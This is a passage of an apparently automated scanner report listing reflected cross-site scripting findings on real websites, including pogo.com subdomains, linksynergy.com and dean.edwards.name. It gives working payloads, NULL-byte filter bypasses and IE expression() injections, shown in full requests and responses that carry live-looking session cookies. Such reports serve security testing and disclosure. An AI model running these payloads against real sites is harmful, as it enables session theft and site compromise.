Host:	http://card-games.pogo.com
Path:	/games/rainy-day-spider-solitaire

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91aec"><script>alert(1)</script>ee1969806b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /games/rainy-day-spider-solitaire?91aec"><script>alert(1)</script>ee1969806b9=1 HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=6E4CADF2B71C2DB23844F14EDC4F4D8A.000163; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606591709314220; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:43 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:06:42 GMT
Server: Apache-Coyote/1.1
Content-Length: 60510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<link rel="canonical" href="http://card-games.pogo.com/games/rainy-day-spider-solitaire?91aec"><script>alert(1)</script>ee1969806b9=1"/>
...[SNIP]...

3.467. http://click.linksynergy.com/fs-bin/stat [offerid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/stat

Issue detail

The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload b8b5e<script>alert(1)</script>ec2a9508206 was submitted in the offerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs-bin/stat?id=FLenzF8lvbI&offerid=78941b8b5e<script>alert(1)</script>ec2a9508206&type=3&subid=0&tmpid=1826 HTTP/1.1
Host: click.linksynergy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 263
Date: Sun, 09 Jan 2011 02:07:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Bad number format in offerid: For input string: "78941b8b5e<script>alert(1)</script>ec2a9508206"
</body>
...[SNIP]...

3.468. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00cf310<a>f30753d02ee was submitted in the REST URL parameter 1. This input was echoed as cf310<a>f30753d02ee in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /weblog%00cf310<a>f30753d02ee/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 02:10:39 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>f30753d02ee/">weblog%00cf310<a>f30753d02ee</a>
...[SNIP]...

3.469. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5c8b"><script>alert(1)</script>133040de622 was submitted in the REST URL parameter 1. This input was echoed as b5c8b"><script>alert(1)</script>133040de622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /weblog%00b5c8b"><script>alert(1)</script>133040de622/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 02:10:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00b5c8b"><script>alert(1)</script>133040de622/2006/">
...[SNIP]...

3.470. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61c9d<a>82844ccdc7b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/06/again61c9d<a>82844ccdc7b/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 02:11:27 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sun, 09 Jan 2011 02:11:27 GMT
Last-Modified: Sun, 09 Jan 2011 02:11:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/again61c9d<a>82844ccdc7b/</h1>
...[SNIP]...

3.471. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff341"><script>alert(1)</script>a6f101894d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff341\"><script>alert(1)</script>a6f101894d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/06/again/?ff341"><script>alert(1)</script>a6f101894d=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:08:55 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Sun, 09 Jan 2011 02:08:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 213691

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?ff341\"><script>alert(1)</script>a6f101894d=1#preview" method="post">
...[SNIP]...

3.472. http://download-games.pogo.com/ [refid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/

Issue detail

The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19ef4"%3balert(1)//ceec74c2135 was submitted in the refid parameter. This input was echoed as 19ef4";alert(1)//ceec74c2135 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?site=pogo&refid=19ef4"%3balert(1)//ceec74c2135&ifw=756&pageSection=header_downloads&ifh=210&lkey=x HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 134282
Cache-Control: private, max-age=14348
Date: Sun, 09 Jan 2011 02:09:39 GMT
Connection: close

<HTML>
   <HEAD>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />
<meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo
...[SNIP]...

   var s_pageName="HomePage"
   /* E-commerce Variables */
   var s_state=""
   var s_zip=""
   var s_purchaseID=""
   var s_events=""
   var s_products=";"
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar6="19ef4";alert(1)//ceec74c2135";
   var s_eVar7="Home Page";
   var s_eVar10="oberonpogostd";
   var s_Prop10="oberonpogostd";

   /* You may add or alter any code config here. */
       var s_server="103";
       var s_
...[SNIP]...

3.473. http://download-games.pogo.com/ [refid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/

Issue detail

The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4a51"%3balert(1)//b1d0df0e2a0 was submitted in the refid parameter. This input was echoed as f4a51";alert(1)//b1d0df0e2a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?site=pogo&refid=headernav_fp_shopmenuf4a51"%3balert(1)//b1d0df0e2a0&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x HTTP/1.1
Host: download-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/account/my-account/main.do
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 138764
Cache-Control: private, max-age=14372
Date: Sun, 09 Jan 2011 02:09:06 GMT
Connection: close

<HTML>
   <HEAD>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />
<meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo
...[SNIP]...
omePage"
   /* E-commerce Variables */
   var s_state=""
   var s_zip=""
   var s_purchaseID=""
   var s_events=""
   var s_products=";"
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar6="headernav_fp_shopmenuf4a51";alert(1)//b1d0df0e2a0";
   var s_eVar7="Home Page";
   var s_eVar10="oberonpogostd";
   var s_Prop10="oberonpogostd";

   /* You may add or alter any code config here. */
       var s_server="103";
       var s_
...[SNIP]...

3.474. http://download-games.pogo.com/ [refid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://download-games.pogo.com
Path:	/

Issue detail

The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b7aed"%20a%3db%20afd5e41295f was submitted in the refid parameter. This input was echoed as b7aed" a=b afd5e41295f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /?site=pogo&refid=%00b7aed"%20a%3db%20afd5e41295f&ifw=756&pageSection=header_downloads&ifh=210&lkey=x HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 133128
Cache-Control: private, max-age=14395
Date: Sun, 09 Jan 2011 02:09:02 GMT
Connection: close

<HTML>
<HEAD>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />
<meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo
...[SNIP]...
<tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=.b7aed" a=b afd5e41295f&Session=&orign=p_leftbar_catName&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" >
...[SNIP]...

3.475. http://download-games.pogo.com/ [refid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/

Issue detail

The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4970"style%3d"x%3aexpr/**/ession(alert(1))"b60ab2ea664 was submitted in the refid parameter. This input was echoed as c4970"style="x:expr/**/ession(alert(1))"b60ab2ea664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?site=pogo&refid=headernav_fp_shopmenuc4970"style%3d"x%3aexpr/**/ession(alert(1))"b60ab2ea664&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x HTTP/1.1
Host: download-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/account/my-account/main.do
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 144112
Cache-Control: private, max-age=14343
Date: Sun, 09 Jan 2011 02:08:53 GMT
Connection: close

<HTML>
<HEAD>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />
<meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo
...[SNIP]...
<tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=headernav_fp_shopmenuc4970"style="x:expr/**/ession(alert(1))"b60ab2ea664&Session=&orign=p_leftbar_catName&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" >
...[SNIP]...

3.476. http://download-games.pogo.com/AllGames.aspx [SortBy parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/AllGames.aspx

Issue detail

The value of the SortBy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125db"style%3d"x%3aexpr/**/ession(alert(1))"7c938b75106 was submitted in the SortBy parameter. This input was echoed as 125db"style="x:expr/**/ession(alert(1))"7c938b75106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /AllGames.aspx?SortBy=gameName125db"style%3d"x%3aexpr/**/ession(alert(1))"7c938b75106&sDir=ASC&Page=1 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 62015
Cache-Control: private, max-age=14400
Date: Sun, 09 Jan 2011 02:10:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<meta name="description" content="Try all downloadable games at Pogo for free including Picktureka! Museum Mayhem,
...[SNIP]...
<a href="/AllGames.aspx?SortBy=gameName125db"style="x:expr/**/ession(alert(1))"7c938b75106&sDir=ASC&Page=0" id="_ctl0_AllGamesUC1_oPagingBarUC_lnkPrev" class="txt11bg" style="text-decoration: underline">
...[SNIP]...

3.477. http://download-games.pogo.com/AllGames.aspx [sDir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/AllGames.aspx

Issue detail

The value of the sDir request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28368"style%3d"x%3aexpr/**/ession(alert(1))"1b59e9936ad was submitted in the sDir parameter. This input was echoed as 28368"style="x:expr/**/ession(alert(1))"1b59e9936ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /AllGames.aspx?SortBy=gameName&sDir=ASC28368"style%3d"x%3aexpr/**/ession(alert(1))"1b59e9936ad&Page=1 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 62760
Cache-Control: private, max-age=14341
Date: Sun, 09 Jan 2011 02:10:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<meta name="description" content="Try all downloadable games at Pogo for free including Picktureka! Museum Mayhem,
...[SNIP]...
<a href="/AllGames.aspx?SortBy=gameName&sDir=ASC28368"style="x:expr/**/ession(alert(1))"1b59e9936ad&Page=0" id="_ctl0_AllGamesUC1_oPagingBarUC_lnkPrev" class="txt11bg" style="text-decoration: underline">
...[SNIP]...

3.478. http://download-games.pogo.com/Category.aspx [RefID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/Category.aspx

Issue detail

The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62ffb"style%3d"x%3aexpr/**/ession(alert(1))"6ae1f7f4fc6 was submitted in the RefID parameter. This input was echoed as 62ffb"style="x:expr/**/ession(alert(1))"6ae1f7f4fc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Category.aspx?code=1002&genre=New&RefID=62ffb"style%3d"x%3aexpr/**/ession(alert(1))"6ae1f7f4fc6&Session=&orign=p_leftbar_catName&ln=en&=0 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 63438
Cache-Control: private, max-age=14380
Date: Sun, 09 Jan 2011 02:10:11 GMT
Connection: close

<html>
<head>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />

<meta name="description" content="Download new games at Pogo including Plants vs. Zombies, Mystic Empor
...[SNIP]...
<tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=62ffb"style="x:expr/**/ession(alert(1))"6ae1f7f4fc6&Session=&orign=p_leftbar_catName&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" >
...[SNIP]...

3.479. http://download-games.pogo.com/Category.aspx [RefID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/Category.aspx

Issue detail

The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0a9c"%3balert(1)//14e5022abab was submitted in the RefID parameter. This input was echoed as b0a9c";alert(1)//14e5022abab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Category.aspx?code=1002&genre=New&RefID=b0a9c"%3balert(1)//14e5022abab&Session=&orign=p_leftbar_catName&ln=en&=0 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 60850
Cache-Control: private, max-age=14344
Date: Sun, 09 Jan 2011 02:10:22 GMT
Connection: close

<html>
<head>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />

<meta name="description" content="Download new games at Pogo including Plants vs. Zombies, Mystic Empor
...[SNIP]...
ategory - [newGames]"
   /* E-commerce Variables */
   var s_state=""
   var s_zip=""
   var s_purchaseID=""
   var s_events=""
   var s_products="newGames;"
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar6="b0a9c";alert(1)//14e5022abab";
   var s_eVar7="Category Page";
   var s_eVar10="oberonpogostd";
   var s_Prop10="oberonpogostd";

